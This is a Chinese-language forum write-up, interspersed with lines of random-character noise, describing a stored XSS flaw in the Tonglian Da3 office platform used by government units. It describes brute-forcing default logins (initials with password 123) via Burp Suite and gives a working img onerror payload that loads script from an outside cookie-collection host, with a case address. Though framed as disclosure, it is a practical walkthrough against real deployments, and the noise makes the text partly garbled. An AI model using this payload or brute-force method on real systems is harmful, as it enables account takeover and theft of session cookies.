! k1 `* }, p1 v* d: r- F
' s. I8 G4 N4 U* p
同联Da3协同办公平台后台通用储存型xss漏洞
5 c) S- P( l& K ~
2 Y, |/ x; ?8 n. B$ g$ O 9 x2 W) |; j7 |. C% ]
平台简介:4 n" {8 a8 A, `. u: f
T; J# B4 O) |
6 G# i; Q5 h1 ~: ~5 Z% p
; m0 z7 p4 k6 y0 q. B2 o
& \- Z5 h& z7 F
! l$ S# S$ U: v# Q4 ^ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& h2 x8 m0 }, y% u1 y3 s4 ^
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 J* f+ u5 I' U) K6 `% G6 V同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 C. n# j& y' h- ?5 Z
x, d: |; {' E" w
( c" i* e3 d3 ]7 Q0 H2 n' ^0 s
4 R2 n9 k, D S- I0 B9 T0 V" ?
; T4 ? F+ v/ q( u. O3 |9 _
8 e$ C1 Y0 E& I3 y' |7 e' Y 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
|% ~' L# t6 i: z% o" m
" |( i7 p8 A2 {8 z! X2 Z; d, X
! K& m5 [2 F# J! @! i2 l3 J1 w
+ c' c5 b% N$ Q
- g5 q' ^1 f. z! ~+ {* b
3 `8 t' C, [# v/ r' X http://1.1.1.1:7197/cap-aco/#(案例2-)6 ?0 y7 E; J8 V" F x8 {8 ^
2 d" x: B7 {" {; I2 f$ R / m- T3 k; M0 j. Q: C. }
http://www.XXOO.com (案例1-官网网站)
/ w. d+ t/ L0 a
8 m4 G% e% K9 r+ p- d% I; d7 ? ' ]1 K0 j( S' z1 U/ k3 Y
漏洞详情:
% w5 F1 a$ q( p2 y# i
2 g; u7 T3 W* r) c1 @3 b0 b" i0 l# M
7 P3 y/ }0 ?: D" G Y3 C, I 案例一、/ P9 {' b! ^8 ~: g4 N
1 A' R. [- R2 s& Y
3 [1 M0 p& F7 w8 W 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试$ ?. r, k* B+ }) v
( b, t& p r3 i
4 r7 a3 {9 F1 }: U! S; ] 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
6 T! V) y C. J j1 c
* K. {* t" B g0 H ^3 X* p * I% b' }! G9 ~, H: `/ r4 r% p0 o
9 e' t& T; v9 u# E0 P
/ x; B9 m4 `1 y( K
6 G# `* g2 M8 F) U
* {5 _7 v+ Z8 |0 I* [" j5 {% M# X/ p
7 C4 I0 j ]$ [5 ^$ R$ h
6 N# r, E: M$ L. j. w2 m status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
$ d' {* b, J+ m6 _ Y
7 M+ q) S6 a2 J+ z
8 Q/ a1 I+ N* Z
8 [. g' O& L O" ^- ^# N
7 ?0 J/ S# F5 ~% Q% e x4 n
, V5 d9 }; z+ w( D/ }7 P0 H- x
1 k6 _) ~. O6 Y. b G6 \
% P% J( V! L3 `! g0 S
) @# V7 K) B7 S" N7 d
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 4 X% F, p' Q1 A
9 |; y# w8 H5 F5 N/ ~6 v
$ x* M2 u7 N/ `9 R5 j
+ C. i$ B+ J" N) I/ F) x6 b$ H
, S+ p3 g# j! S& F2 ^
9 A% ~! k! ]+ N
<img src=x
$ T- m6 W; V/ k6 B: S2 m, }* fonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
: o7 G1 Y. O7 z1 A
4 F6 U+ K9 J6 j( `* @* q
: C" w& K& q% Z% o( P- `( {- ]. c
3 F0 y) O3 a0 u0 V8 ^
i1 K3 X$ j I6 N( E
6 m( _8 L% M) D 然后发送,接收cookie如图: " }4 F$ d7 K ^, D
* C J: y* k, f1 `1 X$ J
) W! C9 W/ K8 N% d1 f1 a) J
* ?, y8 N. A9 M$ ]0 f7 u& d
7 W% n6 b' X8 B( I
# J" N6 N4 x# U" _6 k$ i; m' [5 m
8 \- Q+ e, n) |' c$ E
H, i7 {$ r+ J4 W( Z% e
* }7 B7 X4 E6 L $ z: b7 v- q0 s8 K' ^) k( x$ [+ e
" h& N8 M, U$ E6 M0 e" q1 R
1 R+ A9 L5 g& O , t$ B, G0 |" k8 M) ]/ g
3 `, Q& e/ \# j Q: e# P) P1 Q, v$ u
9 A# V# C9 [3 e( F* H
+ D/ S8 M8 [# } ; e' e' b U9 M' r
d# D, s* W/ B7 O
8 `9 j0 E3 x# ]/ F
3 I8 C5 c2 F2 A' L! Z7 y4 W
A, Z% y. ?- g4 u7 Q. \" o& W
, j. W' O. `: @& K% ~# d
9 ^- y$ j8 q1 n7 r5 ^! \$ f2 a" t 案例2、 ( C, \& i- I/ S" q* ]* p' f
- H4 s4 I3 p9 }( C. `+ O $ W% X* t+ ?; H1 w& `5 O
前面步骤都一样,下面看效果图: 2 t5 K: V: l: `# d" u7 j% J t
J0 C; a5 M# @( n) ?$ z
; G |! ~8 v" g3 ~1 H
- T* O4 C: e$ W8 q l
" z/ K; h4 r( j# j$ w
: s4 ~$ D" v; u
/ e% t9 D7 e' o" T8 W
3 S) M- h j! ?, O
3 q! d! B' b m, X# W* n) Q- g* ^ 0 E- P- W3 Q: I9 i8 a
8 X1 H1 w/ H, f) ]9 W# d . y- m6 j7 r4 C$ K
5 _- B8 V' \: r; T- c
3 O, e8 y7 S! n2 O 0 z) q4 u* E# D
1 q2 h/ {* }8 A% Y% Q. i
+ q* G4 ?$ I% t2 ]- |
- r9 ?& _: J3 l: p
, T' z, y- X T: A3 t
# T: y$ j/ q# ^; F Z4 h
1 ]4 D" i& H [# o2 ~ V$ a6 c8 H/ U% N
; r: A' [4 B* a) r8 x% @, I7 j
/ o0 r; ?7 P$ J$ O! @+ |
. s# l5 i4 z: _9 N& w # ], v) B: a4 S, I$ T! p
[- ^( s% k* [
9 l$ _" A- Y" Q
$ G T1 N/ {- {7 h/ q2 m
( p) Q4 X) z' J# ]/ H